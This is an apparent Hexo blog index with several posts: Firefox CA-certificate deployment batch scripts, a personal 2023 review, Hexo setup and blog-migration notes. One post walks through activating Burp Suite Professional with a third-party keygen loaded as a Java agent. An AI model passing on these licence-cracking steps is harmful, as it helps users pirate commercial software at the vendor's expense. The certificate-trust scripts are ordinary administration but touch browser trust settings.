</span><br><span class="line">)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">set source_file_js=C:\firefoxinstallcert\local-settings.js</span><br><span class="line">set "dest_dir_js=C:\Program Files\Mozilla Firefox\defaults\pref\"</span><br><span class="line">echo Moving %source_file_js% to %dest_dir_js%...</span><br><span class="line">if exist "%source_file_js%" ( </span><br><span class="line"> if exist "%dest_dir_js%" (</span><br><span class="line"> copy "%source_file_js%" "%dest_dir_js%" </span><br><span class="line"> ) else (</span><br><span class="line"> echo Directory does not exist! Cannot move file.</span><br><span class="line"> )</span><br><span class="line">) else (</span><br><span class="line"> echo Source file %source_file_js% does not exist! Cannot move file. </span><br><span class="line">)</span><br><span class="line">set "dest_dir_js_x86=C:\Program Files (x86)\Mozilla Firefox\defaults\pref\"</span><br><span class="line">echo Moving %source_file_js% to %dest_dir_js_x86%...</span><br><span class="line">if exist "%source_file_js%" ( </span><br><span class="line"> if exist "%dest_dir_js_x86%" (</span><br><span class="line"> copy "%source_file_js%" "%dest_dir_js_x86%" </span><br><span class="line"> ) else (</span><br><span class="line"> echo Directory does not exist! Cannot move file.</span><br><span class="line"> )</span><br><span class="line">) else (</span><br><span class="line"> echo Source file %source_file_js% does not exist! Cannot move file. 
</span><br><span class="line">)</span><br><span class="line"></span><br><span class="line">goto :eof</span><br><span class="line"></span><br><span class="line">pause</span><br></pre></td></tr></table></figure><h3 id="脚本2"><a href="#脚本2" class="headerlink" title="脚本2"></a>Script 2</h3><p>Enable security.enterprise_roots.enabled via user.js.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span 
class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span 
class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br></pre></td><td class="code"><pre><span class="line">@echo off</span><br><span class="line">::enable delayed variable expansion</span><br><span class="line">setlocal EnableExtensions EnableDelayedExpansion</span><br><span class="line"></span><br><span class="line">echo ###checking new_version###</span><br><span class="line">echo --------------------------</span><br><span class="line">set regPath1="HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox"</span><br><span class="line">set regPath2="HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox"</span><br><span class="line">set regKey="CurrentVersion"</span><br><span class="line">set regValue=""</span><br><span class="line"></span><br><span class="line">set Value1="checkversion"</span><br><span class="line"></span><br><span class="line">rem check whether the new-version registry key exists</span><br><span class="line">reg query %regPath1% >nul 2>nul</span><br><span class="line">echo 
%errorlevel%</span><br><span class="line">echo !errorlevel!</span><br><span class="line">if %errorlevel%==0 (</span><br><span class="line"> echo new_version Registry key %regkey% exists.</span><br><span class="line"> for /f "tokens=2*" %%a in ('reg query %regPath1% /v %regKey% ^| findstr /i %regKey%') do (</span><br><span class="line"> if "%%b"=="" (</span><br><span class="line"> echo value not exists</span><br><span class="line"> ) else (</span><br><span class="line"> set Value1=%%b</span><br><span class="line"> ) </span><br><span class="line"> )</span><br><span class="line">) else (</span><br><span class="line"> echo new_version Registry key %regkey% does not exist.</span><br><span class="line"> echo --------------------------</span><br><span class="line"> rem check whether the old-version registry path exists (rem, not ::, is used inside parenthesized blocks because :: is a label and is unsafe there)</span><br><span class="line"> echo ###checking old_version###</span><br><span class="line"> reg query %regPath2% >nul 2>nul</span><br><span class="line"> if !errorlevel!==0 (</span><br><span class="line"> echo old_version Registry key %regkey% exists.</span><br><span class="line"> for /f "tokens=2*" %%a in ('reg query %regPath2% /v %regKey% ^| findstr /i %regKey%') do (</span><br><span class="line"> if "%%b"=="" (</span><br><span class="line"> echo value not exists</span><br><span class="line"> ) else (</span><br><span class="line"> set Value1=%%b</span><br><span class="line"> ) </span><br><span class="line"> )</span><br><span class="line"> ) else (</span><br><span class="line"> echo old_version Registry key %regkey% does not exist.</span><br><span class="line"> set Value1=0.0.0</span><br><span class="line"> )</span><br><span class="line"></span><br><span class="line"> echo !Value1!</span><br><span class="line"> echo %Value1%</span><br><span class="line"></span><br><span class="line"> set "Major=%Value1:.=" & set /A "Minor=Revision, Revision=Subrev, Subrev=%"</span><br><span class="line"> echo Majorold: %Major%</span><br><span class="line">)</span><br><span 
class="line"></span><br><span class="line">echo !Value1!</span><br><span class="line">echo %Value1%</span><br><span class="line"></span><br><span class="line">set "Major=%Value1:.=" & set /A "Minor=Revision, Revision=Subrev, Subrev=%"</span><br><span class="line">echo Majornew: %Major%</span><br><span class="line"></span><br><span class="line">::show the final version; 0 means Firefox is not installed</span><br><span class="line">echo --------------------------</span><br><span class="line">set final_version= %Major%</span><br><span class="line">echo final_version %final_version%</span><br><span class="line">echo --------------------------</span><br><span class="line"></span><br><span class="line">rem check the version number</span><br><span class="line">if %final_version% EQU 0 (</span><br><span class="line"> echo Program version is 0. Exiting script...</span><br><span class="line"> exit /b 1</span><br><span class="line">) else if %Major% LSS 49 (</span><br><span class="line"> call :function1</span><br><span class="line">) else (</span><br><span class="line"> call :function2</span><br><span class="line">)</span><br><span class="line"></span><br><span class="line">rem exit the script</span><br><span class="line">exit /b</span><br><span class="line"></span><br><span class="line">::</span><br><span class="line">:function1</span><br><span class="line">echo Program version is less than 49. Executing function 1...</span><br><span class="line">rem code for function 1: below version 49, update the cert8.db certificate store.</span><br><span class="line"></span><br><span class="line">::show the certificates currently in the db</span><br><span class="line">set "db_path=%USERPROFILE%\AppData\Roaming\Mozilla\Firefox\Profiles\"</span><br><span class="line">set default_name=""</span><br><span class="line">::check whether the certificate database path exists</span><br><span class="line">IF EXIST "%db_path%" (</span><br><span class="line"> echo default_path exists</span><br><span class="line"> rem add the commands to run here</span><br><span class="line"> set "count=0"</span><br><span class="line"> for /d %%i in ("%db_path%*") do (</span><br><span class="line"> set /a count+=1</span><br><span class="line"> set "folder=%%~nxi"</span><br><span class="line"> )</span><br><span class="line"> rem check that *.default is the only folder</span><br><span class="line"> if !count! equ 1 (</span><br><span class="line"> set default_name=!folder!</span><br><span class="line"> set "all_path=%db_path%!default_name!"</span><br><span class="line"> rem show the full path of the default folder</span><br><span class="line"> echo !all_path!</span><br><span class="line"> rem show the certificate store before the update</span><br><span class="line"> C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -L -d "!all_path!"</span><br><span class="line"> rem update the certificate store (note: the trust flags "u,u,u" mark a user certificate; a CA that should be trusted for TLS server certificates is normally added with "C,,")</span><br><span class="line"> C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -A -n "SomeNametest" -t "u,u,u" -i "C:\firefoxinstallcert\TPLINKCA.cer" -d "!all_path!"</span><br><span class="line"> rem show the certificate store after the update</span><br><span class="line"> C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -L -d "!all_path!"</span><br><span class="line"> ) else (</span><br><span class="line"> echo no or more</span><br><span class="line"> )</span><br><span class="line">) ELSE (</span><br><span class="line"> echo no</span><br><span class="line">)</span><br><span class="line"></span><br><span class="line">goto :eof</span><br><span class="line"></span><br><span class="line">:function2</span><br><span class="line">echo Program version is greater than or equal to 49. Executing function 2...</span><br><span class="line">rem code for function 2: on Firefox 49 and above, enable security.enterprise_roots.enabled by adding a user.js config file</span><br><span class="line"></span><br><span class="line">::default profiles directory</span><br><span class="line">set "parentFolder=%APPDATA%\Mozilla\Firefox\Profiles"</span><br><span class="line">::search for folders whose name contains "default", i.e. the profile folders</span><br><span class="line">set "searchString=default"</span><br><span class="line">set source_user_js=C:\firefoxinstallcert\user.js</span><br><span class="line">::copy the user.js file into the profile directory</span><br><span class="line"></span><br><span class="line">IF EXIST "%parentFolder%" (</span><br><span class="line"> for /d %%F in ("%parentFolder%\*") do (</span><br><span class="line"> echo "%%~nxF" | findstr /C:"%searchString%" >nul 2>&1</span><br><span class="line"> if errorlevel 1 (</span><br><span class="line"> echo default Folder not found.</span><br><span class="line"> ) else (</span><br><span class="line"> echo default Folder found.</span><br><span class="line"> rem build the full path</span><br><span class="line"> set "all_default_path=%parentFolder%\%%~nxF"</span><br><span class="line"> echo !all_default_path!</span><br><span class="line"> copy "%source_user_js%" "!all_default_path!"</span><br><span class="line"> )</span><br><span class="line"> )</span><br><span class="line">) ELSE (</span><br><span class="line"> echo no</span><br><span class="line">)</span><br><span class="line">goto :eof</span><br><span class="line">pause</span><br></pre></td></tr></table></figure><h2 id="其他参考资料"><a href="#其他参考资料" class="headerlink" title="其他参考资料"></a>Other references</h2><p><a href="http://www.certificate.fyicenter.com/389_Download_Mozilla_certutil_Tool_for_Windows_7.html">http://www.certificate.fyicenter.com/389_Download_Mozilla_certutil_Tool_for_Windows_7.html</a></p><p><a href="https://dev-tech-crypto.mozilla.narkive.com/QtN6vuxG/availability-of-certutil-on-windows">https://dev-tech-crypto.mozilla.narkive.com/QtN6vuxG/availability-of-certutil-on-windows</a></p><p><a href="https://brpoblog.wordpress.com/2015/10/02/add-certificates-to-firefox-installation-with-certutil/">https://brpoblog.wordpress.com/2015/10/02/add-certificates-to-firefox-installation-with-certutil/</a></p>]]></content>
</entry>
<entry>
<title>SOC and SIEM Construction</title>
<link href="/2023/05/20/SOC%E5%92%8CSIEM%E5%BB%BA%E8%AE%BE/"/>
<url>/2023/05/20/SOC%E5%92%8CSIEM%E5%BB%BA%E8%AE%BE/</url>
<content type="html"><![CDATA[<h1 id="SOC和SIEM建设"><a href="#SOC和SIEM建设" class="headerlink" title="SOC和SIEM建设"></a>SOC and SIEM Construction</h1><p>To be continued.</p><p>Image reference method 1</p><img src="/2023/05/20/SOC%E5%92%8CSIEM%E5%BB%BA%E8%AE%BE/1.jpg" class=""><p>Image reference method 2:</p><p><img src="/2023/05/20/SOC%E5%92%8CSIEM%E5%BB%BA%E8%AE%BE/1.jpg" alt="pic"></p><p>Several ways to set the cover image:</p><ul><li>Reference the folder with the same name directly</li><li>Reference an image under /img</li><li>Add a hyperlink</li></ul>]]></content>
<categories>
<category> 安全 </category>
</categories>
<tags>
<tag> 安全 </tag>
<tag> SIEM </tag>
<tag> SOC </tag>
</tags>
</entry>
<entry>
<title>Outlook for 2023</title>
<link href="/2023/01/01/2023%E5%B9%B4%E5%B1%95%E6%9C%9B/"/>
<url>/2023/01/01/2023%E5%B9%B4%E5%B1%95%E6%9C%9B/</url>
<content type="html"><![CDATA[<h2 id="2022年总结"><a href="#2022年总结" class="headerlink" title="2022年总结"></a>2022 in Review</h2><p>The whole of 2022 was rather oppressive: endless lockdowns, a nucleic acid test every single day, up to three a day at the peak. Then in December everything suddenly opened up; I had the luck to be the second-to-last person in my department to test positive 🐏, so I made it into the final round, so to speak. Today I have almost recovered; overall it felt like a moderate cold, nothing serious.</p><p>The base provided a great environment; I enjoyed the best library and spent most of the year there with a quiet mind. The 2022 graduate entrance exam ended in failure (strictly speaking, I sat it in 2021); I did all the preparation I should have, but my ability fell short and I missed the cutoff by a dozen or so points. Many friends around me went for a second attempt; I regret it too, but I had to move on.</p><p>Back at school, in the second semester of senior year, I started preparing for interviews. At the peak I had four rounds of interviews in a day and went numb from them. By the end of March I had seven or eight offers, picked one that was decent enough, and wrapped things up in a hurry.</p><p>Then came another extremely oppressive and painful period: I chose a fairly cutting-edge cryptography topic, the theory was hard to grasp and the experiments even harder, and the pressure from my advisor was stronger than the biggest shadow of my childhood, my piano teacher. Fortunately a kind senior student helped guide me, and in the end I graduated smoothly.</p><p>It has been half a year since I left school; I do not miss it much, and perhaps it will be many years before I go back.</p><p>I spent a wonderful summer in my hometown, one of the rare truly relaxed stretches in life. The previous one was after the college entrance exam; the next one will probably be retirement.</p><p>At the end of July I went south to Shenzhen alone and officially became a wage earner.</p><p>Half a year of work, and 2022 was over.</p><h2 id="2023年展望"><a href="#2023年展望" class="headerlink" title="2023年展望"></a>Outlook for 2023</h2><p>In the coming year I hope to plan my career well, keep my personal habits in check, and buy more things for my family. Develop a few hobbies (suona, fishing, Go, etc.), exercise more, and read a few more books.</p><p>A few goals:</p><ul><li><input disabled="" type="checkbox"> Write at least one blog post a month</li><li><input disabled="" type="checkbox"> Take the CCNP in the first half of the year</li><li><input disabled="" type="checkbox"> Get the OSCP in the second half of the year</li><li><input checked="" disabled="" type="checkbox"> If possible, get a cat 🐱</li></ul><p>May 2023 go smoothly.</p>]]></content>
<categories>
<category> 感悟 </category>
</categories>
</entry>
<entry>
<title>Hello hexo</title>
<link href="/2022/12/31/hello-hexo/"/>
<url>/2022/12/31/hello-hexo/</url>
<content type="html"><![CDATA[<p>Welcome to <a href="https://hexo.io/">Hexo</a>! This is your very first post. Check <a href="https://hexo.io/docs/">documentation</a> for more info. If you get any problems when using Hexo, you can find the answer in <a href="https://hexo.io/docs/troubleshooting.html">troubleshooting</a> or you can ask me on <a href="https://github.com/hexojs/hexo/issues">GitHub</a>.</p><h2 id="Quick-Start"><a href="#Quick-Start" class="headerlink" title="Quick Start"></a>Quick Start</h2><h3 id="Create-a-new-post"><a href="#Create-a-new-post" class="headerlink" title="Create a new post"></a>Create a new post</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hexo new <span class="string">"My New Post"</span></span><br></pre></td></tr></table></figure><p>More info: <a href="https://hexo.io/docs/writing.html">Writing</a></p><h3 id="Clean"><a href="#Clean" class="headerlink" title="Clean"></a>Clean</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hexo clean</span><br></pre></td></tr></table></figure><h3 id="Run-server"><a href="#Run-server" class="headerlink" title="Run server"></a>Run server</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hexo server</span><br></pre></td></tr></table></figure><p>More info: <a href="https://hexo.io/docs/server.html">Server</a></p><h3 id="Generate-static-files"><a href="#Generate-static-files" class="headerlink" title="Generate static files"></a>Generate static files</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hexo generate</span><br></pre></td></tr></table></figure><p>More info: <a 
href="https://hexo.io/docs/generating.html">Generating</a></p><h3 id="Deploy-to-remote-sites"><a href="#Deploy-to-remote-sites" class="headerlink" title="Deploy to remote sites"></a>Deploy to remote sites</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hexo deploy</span><br></pre></td></tr></table></figure><p>More info: <a href="https://hexo.io/docs/one-command-deployment.html">Deployment</a></p>]]></content>
<categories>
<category> blog </category>
</categories>
<tags>
<tag> blog </tag>
</tags>
</entry>
<entry>
<title>Installing Burp Suite Professional on Mac</title>
<link href="/2022/12/26/burpsuite/"/>
<url>/2022/12/26/burpsuite/</url>
<content type="html"><![CDATA[<h1 id="Mac下安装BP-Profession"><a href="#Mac下安装BP-Profession" class="headerlink" title="Mac下安装BP Profession"></a>Installing BP Professional on Mac</h1><h3 id="背景"><a href="#背景" class="headerlink" title="背景"></a>Background</h3><p>The keygen I used before no longer works, so I need a new one.</p><p>Previously: <a href="https://github.com/TrojanAZhen/BurpSuitePro-2.1">https://github.com/TrojanAZhen/BurpSuitePro-2.1</a></p><p>Now using: <a href="https://github.com/h3110w0r1d-y/BurpLoaderKeygen">https://github.com/h3110w0r1d-y/BurpLoaderKeygen</a></p><h3 id="安装"><a href="#安装" class="headerlink" title="安装"></a>Installation</h3><p>First download and install from the official site.</p><p><a href="https://portswigger.net/burp/releases">https://portswigger.net/burp/releases</a></p><p>As usual, put the jar in the same directory as the Burp Suite app,</p><p><img src="/2022/12/26/burpsuite/test2.png" alt="pic"></p><p>Run:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cd /Applications/Burp\ Suite\ Professional.app/Contents/Resources/app && "/Applications/Burp Suite Professional.app/Contents/Resources/jre.bundle/Contents/Home/bin/java" "--add-opens=java.desktop/javax.swing=ALL-UNNAMED" "--add-opens=java.base/java.lang=ALL-UNNAMED" "--add-opens=java.base/jdk.internal.org.objectweb.asm=ALL-UNNAMED" "--add-opens=java.base/jdk.internal.org.objectweb.asm.tree=ALL-UNNAMED" "--add-opens=java.base/jdk.internal.org.objectweb.asm.Opcodes=ALL-UNNAMED" "-javaagent:BurpLoaderKeygen.jar" "-jar" "/Applications/Burp Suite Professional.app/Contents/Resources/app/burpsuite_pro.jar"</span><br></pre></td></tr></table></figure><p>Open another terminal:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/Applications/Burp\ Suite\ Professional.app/Contents/Resources/jre.bundle/Contents/Home/bin/java -jar /Applications/Burp\ Suite\ 
Professional.app/Contents/Resources/app/BurpLoaderKeygen.jar</span><br></pre></td></tr></table></figure><p>Then follow the usual registration process.</p><p>For convenience,</p><p>edit vmoptions.txt</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">-XX:MaxRAMPercentage=50</span><br><span class="line">-include-options user.vmoptions--add-opens=java.desktop/javax.swing=ALL-UNNAMED</span><br><span class="line">--add-opens=java.base/java.lang=ALL-UNNAMED</span><br><span class="line">--add-opens=java.base/jdk.internal.org.objectweb.asm=ALL-UNNAMED</span><br><span class="line">--add-opens=java.base/jdk.internal.org.objectweb.asm.tree=ALL-UNNAMED</span><br><span class="line">--add-opens=java.base/jdk.internal.org.objectweb.asm.Opcodes=ALL-UNNAMED</span><br><span class="line">-javaagent:BurpLoaderKeygen.jar</span><br><span class="line">-Xmx2048m</span><br></pre></td></tr></table></figure><img src="/2022/12/26/burpsuite/test1.png" class=""><p>After that it works normally.</p><h3 id="参考"><a href="#参考" class="headerlink" title="参考"></a>References</h3><p><a href="https://www.sqlsec.com/2019/11/macbp.html#BP-2022-1">https://www.sqlsec.com/2019/11/macbp.html#BP-2022-1</a></p>]]></content>
</entry>
<entry>
<title>Blog Migration</title>
<link href="/2022/12/04/%E5%8D%9A%E5%AE%A2%E8%BF%81%E7%A7%BB/"/>
<url>/2022/12/04/%E5%8D%9A%E5%AE%A2%E8%BF%81%E7%A7%BB/</url>
<content type="html"><![CDATA[<hr><h3 id="为什么迁移博客"><a href="#为什么迁移博客" class="headerlink" title="Why migrate the blog"></a>Why migrate the blog</h3><p>The previous blog had been in use for almost three years and had a few small problems; I also found that some images were broken and had even been replaced with ads, which I could not tolerate.</p><p>It was also very slow, so I decided to switch frameworks and migrate everything.</p><p>I used to use Jekyll with a niche theme: very clean, with a language translation feature and a decent mobile layout. But it was hard to extend, few people used it, and its features were incomplete.</p><h3 id="需求"><a href="#需求" class="headerlink" title="Requirements"></a>Requirements</h3><p>Current requirements:</p><ul><li><p>RSS support</p></li><li><p>External links (GitHub, Zhihu, etc.)</p></li><li><p>Show site uptime and total visit count</p></li><li><p>Archive, sorted newest first</p></li><li><p>Sharing to WeChat, QQ and Twitter</p></li><li><p>Related post recommendations</p></li><li><p>Announcements</p></li></ul><p>Longer-term requirements:</p><ul><li>Comments</li><li>Pop-up chat box</li><li>Ad insertion</li><li>Tipping/donations</li></ul><h3 id="寻找框架主题"><a href="#寻找框架主题" class="headerlink" title="Finding a framework and theme"></a>Finding a framework and theme</h3><p>There are three mainstream static site frameworks:</p><ul><li><strong>Hexo</strong></li><li><strong>Hugo</strong></li><li><strong>Jekyll</strong></li></ul><p>I finally decided on Hexo.</p><p>Framework: <a href="https://github.com/hexojs/hexo">https://github.com/hexojs/hexo</a></p><p>Theme: <a href="https://github.com/jerryc127/hexo-theme-butterfly">butterfly</a></p><p>This framework is widely used in China, so problems are easy to look up; the theme is feature-complete, and other people's demos looked stunning.</p><p>It meets every requirement I have.</p><p>The downside is that editing from multiple devices is inconvenient: the site has to be generated locally and then all files uploaded. With Jekyll, uploading a single md file was enough.</p><h3 id="迁移进度"><a href="#迁移进度" class="headerlink" title="Migration progress"></a>Migration progress</h3><ul><li><input checked="" disabled="" type="checkbox"> Framework migration</li><li><input checked="" disabled="" type="checkbox"> Post migration</li><li><input checked="" disabled="" type="checkbox"> Convert formatting to Hexo format</li><li><input checked="" disabled="" type="checkbox"> Image migration (some images migrated; some return 404 because SMS took them down; all images will be hosted on GitHub later)</li><li><input disabled="" type="checkbox"> Multi-device sync (main branch holds the source files, gh-pages holds the generated files; tried and failed)</li><li><input checked="" disabled="" type="checkbox"> Formatting polish</li><li><input disabled="" type="checkbox"> Configure a CDN</li></ul><h3 id="渐变背景色"><a href="#渐变背景色" class="headerlink" title="Gradient background"></a>Gradient background</h3><p>References:</p><p><a href="https://www.antmoe.com/posts/7198453">https://www.antmoe.com/posts/7198453</a></p><p><a href="https://www.cnblogs.com/MoYu-zc/p/14397889.html">https://www.cnblogs.com/MoYu-zc/p/14397889.html</a></p><p>I ran into a problem where the gradient did not take effect; the articles above solved it: change <code>background</code> in <code>butterfly.yml</code> to <code>"#efefef"</code>.</p><p>Below is the CSS file that configures the background colour.</p> <figure class="highlight css"><table><tr><td class="code"><pre><span class="line">/* Post page background */</span><br><span class="line">.layout > div:first-child:not(.recent-posts) {</span><br><span class="line"> /* white with 0.5 opacity */</span><br><span class="line"> background: rgba(255, 255, 255, 0.5);</span><br><span class="line">}</span><br><span class="line">/* All backgrounds (home page cards, post pages, pages, etc.) */</span><br><span class="line">#recent-posts > .recent-post-item,</span><br><span class="line">.layout > div:first-child:not(.recent-posts),</span><br><span class="line">.layout_post > #page,</span><br><span class="line">.layout_post > #post,</span><br><span class="line">.read-mode .layout_post > #post {</span><br><span class="line"> /* white with 0.5 opacity */</span><br><span class="line"> background: rgba(255, 255, 255, 0.5);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">/* Background gradient */</span><br><span class="line">#web_bg{</span><br><span class="line"> /* purple-pink gradient */</span><br><span class="line"> /*background-image: linear-gradient(120deg, #e0c3fc 0%, #8ec5fc 100%);*/</span><br><span class="line"> /* pink-white-blue */</span><br><span class="line"> /*background-image: linear-gradient(-225deg, #dfbacd 0%, #B8DCFF 48%, #58abf3 100%);*/</span><br><span class="line"> /*background-image: linear-gradient(120deg, #89f7fe 0%, #66a6ff 100%);*/</span><br><span class="line"> /*background-image: linear-gradient(120deg, #a1c4fd 0%, #c2e9fb 100%);*/</span><br><span class="line"> background-image: linear-gradient(to top, #fff1eb 0%, #ace0f9 100%);</span><br><span class="line">}</span><br></pre></td></tr></table></figure><h3 id="安装插件"><a href="#安装插件" class="headerlink" title="Installing plugins"></a>Installing plugins</h3><figure class="highlight plaintext"><figcaption><span>install hexo-renderer-pug hexo-renderer-stylus --save</span></figcaption><table><tr><td class="code"><pre><span class="line"># Word count</span><br><span class="line">npm install hexo-wordcount --save</span><br><span class="line"># Local search</span><br><span class="line">npm install hexo-generator-search --save</span><br><span class="line"># Lazy loading</span><br><span class="line">npm install hexo-lazyload-image --save</span><br><span class="line"># Push to GitHub</span><br><span class="line">npm install hexo-deployer-git --save</span><br><span class="line"># RSS feed</span><br><span class="line">npm install hexo-generator-feed --save</span><br><span class="line"></span><br><span class="line"># Installed later, for image references</span><br><span class="line">cnpm install hexo-renderer-marked</span><br></pre></td></tr></table></figure><h3 id="一些小坑"><a href="#一些小坑" class="headerlink" title="A few pitfalls"></a>A few pitfalls</h3><ol><li>Note that in the config files a space is required after the colon.</li><li>Because my GitHub Pro had expired, and free GitHub users can only use GitHub Pages with a public repository, I made the repository public.</li><li>Currently this theme only supports UA tracking IDs; I looked it up and Google is retiring them in July 2023, so I am skipping analytics for now.</li></ol><p>Some other issues are recorded in the README.</p><p><a href="https://github.com/h4m5t/h4m5t.github.io/blob/master/README.md">https://github.com/h4m5t/h4m5t.github.io/blob/master/README.md</a></p><h3 id="修改Profile-README"><a href="#修改Profile-README" class="headerlink" title="Updating the profile README"></a>Updating the profile README</h3><p>While at it I also updated my GitHub profile README; different colour themes can be chosen.</p><p>tokyonight</p><p><a href="https://github.com/h4m5t/github-readme-stats"><img src="https://github-readme-stats.vercel.app/api?username=h4m5t&theme=tokyonight&hide=contribs&show_icons=true" alt="h4m5t's GitHub stats"></a></p><p>Vue</p><p><a href="https://github.com/h4m5t/github-readme-stats"><img src="https://github-readme-stats.vercel.app/api/top-langs/?username=h4m5t&theme=vue&hide=html" alt="Top Langs"></a></p><p>See the repos below.</p><a href="https://github.com/anuraghazra/github-readme-stats"> <img align="center" src="https://github-readme-stats.vercel.app/api/pin/?username=anuraghazra&repo=github-readme-stats&theme=buefy" /></a><a href="https://github.com/anuraghazra/anuraghazra.github.io"> <img align="center" src="https://github-readme-stats.vercel.app/api/pin/?username=anuraghazra&repo=anuraghazra.github.io&theme=buefy" /></a><p>They can be combined into a table, which looks tidier.</p><table><thead><tr><th><a href="https://github.com/h4m5t/github-readme-stats"><img align="center" src="https://github-readme-stats.vercel.app/api?username=h4m5t&show_icons=true&theme=vue&hide=contribs&hide_border=true" alt="h4m5t's github stats" /></a></th><th><a href="https://github.com/h4m5t/github-readme-stats"><img align="center" src="https://github-readme-stats.vercel.app/api/top-langs/?username=h4m5t&layout=default&theme=vue&hide=html&hide_border=true" /></a></th></tr></thead></table><p>Or use the automatic generator:</p><p><a href="https://rahuldkjain.github.io/gh-profile-readme-generator/">https://rahuldkjain.github.io/gh-profile-readme-generator/</a></p>]]></content>
<categories>
<category> blog </category>
</categories>
<tags>
<tag> blog </tag>
<tag> Github </tag>
</tags>
</entry>
<entry>
<title>Image Test</title>
<link href="/2022/12/01/%E5%9B%BE%E7%89%87%E6%B5%8B%E8%AF%95/"/>
<url>/2022/12/01/%E5%9B%BE%E7%89%87%E6%B5%8B%E8%AF%95/</url>
<content type="html"><![CDATA[<p>ss</p><p>Image test:</p><p><img src="/../img/1.jpg" alt="hh"></p><p>Avatar:</p><p><img src="/../img/tou.jpg" alt="touxiang"></p>]]></content>
</entry>
<entry>
<title>Spring Recruitment</title>
<link href="/2022/08/23/%E6%98%A5%E6%8B%9B/"/>
<url>/2022/08/23/%E6%98%A5%E6%8B%9B/</url>
